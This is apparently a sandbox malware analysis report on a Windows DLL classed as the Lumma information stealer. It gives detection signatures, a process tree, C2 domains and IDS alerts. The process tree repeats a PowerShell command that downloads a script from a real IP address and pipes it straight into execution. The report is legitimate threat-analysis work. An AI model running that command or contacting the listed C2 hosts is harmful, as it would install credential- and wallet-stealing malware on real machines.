Edit tour
Windows
Analysis Report
iviewers.dll
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: PowerShell Download and Execution Cradles
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- loaddll32.exe (PID: 7652 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\ivi ewers.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618) - conhost.exe (PID: 7660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7700 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\ivi ewers.dll" ,#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - rundll32.exe (PID: 7744 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\ivie wers.dll", #1 MD5: 889B99C52A60DD49227C5E485A016679) - csc.exe (PID: 7364 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\shgzzqqc \shgzzqqc. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - conhost.exe (PID: 4608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cvtres.exe (PID: 7060 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S6C65.tmp" "c:\Users \user\AppD ata\Local\ Temp\shgzz qqc\CSC104 EE36483A04 EF7B85B764 3AE3701F.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - powershell.exe (PID: 5656 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " iwr -useb 'http://14 7.45.44.13 1/infopage /ybfh.ps1' -Headers @{'X-Speci al-Header' ='qInx8F3t uJDHXgOEfP JjbaipYaSE 1mobJ2YRyo 2rjNgnVDhJ vevN8R2ku8 oPCBonhmpz Fb2GYqPiLh Jq'} | iex " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1344 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 3700 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\pejlabp5 \pejlabp5. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 1280 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S83D5.tmp" "c:\Users \user\AppD ata\Local\ Temp\pejla bp5\CSCDF7 01219C1C48 818E6CA425 D3E8BAB7.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - RegAsm.exe (PID: 4132 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - regsvr32.exe (PID: 7720 cmdline:
regsvr32.e xe /s C:\U sers\user\ Desktop\iv iewers.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0) - csc.exe (PID: 7892 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\snjgawjs \snjgawjs. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - conhost.exe (PID: 7904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cvtres.exe (PID: 7956 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S61E6.tmp" "c:\Users \user\AppD ata\Local\ Temp\snjga wjs\CSC3AE 61AA7D3846 E6BE99F6A9 2C13265.TM P" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - powershell.exe (PID: 8068 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " iwr -useb 'http://14 7.45.44.13 1/infopage /ybfh.ps1' -Headers @{'X-Speci al-Header' ='qInx8F3t uJDHXgOEfP JjbaipYaSE 1mobJ2YRyo 2rjNgnVDhJ vevN8R2ku8 oPCBonhmpz Fb2GYqPiLh Jq'} | iex " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 8076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 3228 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\ljtzeyvh \ljtzeyvh. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 1036 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S7C53.tmp" "c:\Users \user\AppD ata\Local\ Temp\ljtze yvh\CSC85D 6A8B45C747 74986DA7C6 AC7246BE.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - RegAsm.exe (PID: 2080 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 2288 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - rundll32.exe (PID: 7736 cmdline:
rundll32.e xe C:\User s\user\Des ktop\iview ers.dll,Dl lRegisterS erver MD5: 889B99C52A60DD49227C5E485A016679) - csc.exe (PID: 7972 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\zhytdsxg \zhytdsxg. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - conhost.exe (PID: 7980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cvtres.exe (PID: 8048 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S63AB.tmp" "c:\Users \user\AppD ata\Local\ Temp\zhytd sxg\CSC3C5 171C2F0D34 6F28B74AD3 59FA9163B. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - powershell.exe (PID: 7228 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " iwr -useb 'http://14 7.45.44.13 1/infopage /ybfh.ps1' -Headers @{'X-Speci al-Header' ='qInx8F3t uJDHXgOEfP JjbaipYaSE 1mobJ2YRyo 2rjNgnVDhJ vevN8R2ku8 oPCBonhmpz Fb2GYqPiLh Jq'} | iex " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7252 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 5508 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\tkky4heb \tkky4heb. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 1568 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S7CE0.tmp" "c:\Users \user\AppD ata\Local\ Temp\tkky4 heb\CSC9A9 BD2EDD89B4 875B92A5CE F8AA9766.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - RegAsm.exe (PID: 4152 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - csc.exe (PID: 7576 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\ceo01y5g \ceo01y5g. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 6052 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S7946.tmp" "c:\Users \user\AppD ata\Local\ Temp\ceo01 y5g\CSC7CE 9657BAB745 96AF1C43C9 3161D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - powershell.exe (PID: 3352 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " iwr -useb 'http://14 7.45.44.13 1/infopage /ybfh.ps1' -Headers @{'X-Speci al-Header' ='qInx8F3t uJDHXgOEfP JjbaipYaSE 1mobJ2YRyo 2rjNgnVDhJ vevN8R2ku8 oPCBonhmpz Fb2GYqPiLh Jq'} | iex " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3636 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 4640 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\rcv5n2si \rcv5n2si. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 4568 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S9337.tmp" "c:\Users \user\AppD ata\Local\ Temp\rcv5n 2si\CSC2F3 61128F45F4 F0A9752D64 55878CB1F. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - RegAsm.exe (PID: 4936 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 3800 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 4352 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["rapeflowwj.lat", "crosshuaht.lat", "volcanoyev.click", "energyaffai.lat", "aspecteirs.lat", "necklacebudi.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "VC6Dfm--Loader2"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | ||
Click to see the 5 entries |
System Summary |
---|
Source: | Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-24T02:18:20.445540+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:20.446008+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:21.489323+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:22.831849+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:23.131739+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:23.478840+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:25.786583+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49717 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:26.049767+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:28.029002+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49719 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:28.253360+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49720 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:30.647319+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:33.014934+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49723 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:33.016177+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49722 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:35.342680+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49724 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:35.354173+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49725 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:37.455265+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49726 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:38.944428+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49727 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:39.726092+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49728 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:42.029577+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49729 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:44.807871+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49730 | 172.67.195.241 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-24T02:18:21.915329+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:21.936896+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:22.256469+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:24.238070+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:26.799396+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:28.794733+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:39.723586+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49727 | 172.67.195.241 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-24T02:18:21.915329+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:21.936896+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:22.256469+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:26.799396+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-24T02:18:24.238070+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP |
2024-12-24T02:18:28.794733+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 172.67.195.241 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-24T02:18:26.991906+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49717 | 172.67.195.241 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-24T02:18:15.825605+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 147.45.44.131 | 80 | TCP |
2024-12-24T02:18:15.882650+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 147.45.44.131 | 80 | TCP |
2024-12-24T02:18:16.547808+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 147.45.44.131 | 80 | TCP |
2024-12-24T02:18:16.621990+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 147.45.44.131 | 80 | TCP |
2024-12-24T02:18:17.508551+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 147.45.44.131 | 80 | TCP |
2024-12-24T02:18:18.493265+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 147.45.44.131 | 80 | TCP |
2024-12-24T02:18:21.702761+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49711 | 147.45.44.131 | 80 | TCP |
2024-12-24T02:18:22.428578+0100 | 2859377 | 1 | A Network Trojan was detected | 192.168.2.8 | 49711 | 147.45.44.131 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Directory queried: |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Code function: | 31_2_0043C767 | |
Source: | Code function: | 31_2_0042984F | |
Source: | Code function: | 31_2_00423860 | |
Source: | Code function: | 31_2_00438810 | |
Source: | Code function: | 31_2_00438810 | |
Source: | Code function: | 31_2_00438810 | |
Source: | Code function: | 31_2_00438810 | |
Source: | Code function: | 31_2_0041682D | |
Source: | Code function: | 31_2_0041682D | |
Source: | Code function: | 31_2_0041682D | |
Source: | Code function: | 31_2_0041D83A | |
Source: | Code function: | 31_2_00423086 | |
Source: | Code function: | 31_2_00423086 | |
Source: | Code function: | 31_2_0042B170 | |
Source: | Code function: | 31_2_004179C1 | |
Source: | Code function: | 31_2_0043B1D0 | |
Source: | Code function: | 31_2_0043B1D0 | |
Source: | Code function: | 31_2_004291DD | |
Source: | Code function: | 31_2_004291DD | |
Source: | Code function: | 31_2_00405990 | |
Source: | Code function: | 31_2_00405990 | |
Source: | Code function: | 31_2_00422190 | |
Source: | Code function: | 31_2_00422190 | |
Source: | Code function: | 31_2_00422190 | |
Source: | Code function: | 31_2_0042CA49 | |
Source: | Code function: | 31_2_0042DA53 | |
Source: | Code function: | 31_2_00416263 | |
Source: | Code function: | 31_2_00415220 | |
Source: | Code function: | 31_2_00427AD3 | |
Source: | Code function: | 31_2_0042CAD0 | |
Source: | Code function: | 31_2_0041B2E0 | |
Source: | Code function: | 31_2_0043CA93 | |
Source: | Code function: | 31_2_0041CB40 | |
Source: | Code function: | 31_2_0041CB40 | |
Source: | Code function: | 31_2_00428B61 | |
Source: | Code function: | 31_2_0042CB11 | |
Source: | Code function: | 31_2_0042CB22 | |
Source: | Code function: | 31_2_0043F330 | |
Source: | Code function: | 31_2_0040DBD9 | |
Source: | Code function: | 31_2_0040DBD9 | |
Source: | Code function: | 31_2_00417380 | |
Source: | Code function: | 31_2_0041D380 | |
Source: | Code function: | 31_2_00426B95 | |
Source: | Code function: | 31_2_00435450 | |
Source: | Code function: | 31_2_00417380 | |
Source: | Code function: | 31_2_00429C2B | |
Source: | Code function: | 31_2_004291DD | |
Source: | Code function: | 31_2_004291DD | |
Source: | Code function: | 31_2_004074F0 | |
Source: | Code function: | 31_2_004074F0 | |
Source: | Code function: | 31_2_0043ECA0 | |
Source: | Code function: | 31_2_004385E0 | |
Source: | Code function: | 31_2_004385E0 | |
Source: | Code function: | 31_2_00417DEE | |
Source: | Code function: | 31_2_00409580 | |
Source: | Code function: | 31_2_00409580 | |
Source: | Code function: | 31_2_00418591 | |
Source: | Code function: | 31_2_00428D93 | |
Source: | Code function: | 31_2_0041759F | |
Source: | Code function: | 31_2_0041C653 | |
Source: | Code function: | 31_2_00425E70 | |
Source: | Code function: | 31_2_00425E30 | |
Source: | Code function: | 31_2_0043AEC0 | |
Source: | Code function: | 31_2_00408F50 | |
Source: | Code function: | 31_2_00408F50 | |
Source: | Code function: | 31_2_0042A700 | |
Source: | Code function: | 31_2_0040B70C | |
Source: | Code function: | 31_2_0041BF14 | |
Source: | Code function: | 31_2_00419F30 | |
Source: | Code function: | 31_2_0041E7C0 | |
Source: | Code function: | 31_2_004197C2 | |
Source: | Code function: | 31_2_004197C2 | |
Source: | Code function: | 31_2_004197C2 | |
Source: | Code function: | 31_2_0042DFE9 | |
Source: | Code function: | 31_2_0040BFFD | |
Source: | Code function: | 31_2_00415799 | |
Source: | Code function: | 31_2_00415799 | |
Source: | Code function: | 31_2_0043EFB0 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
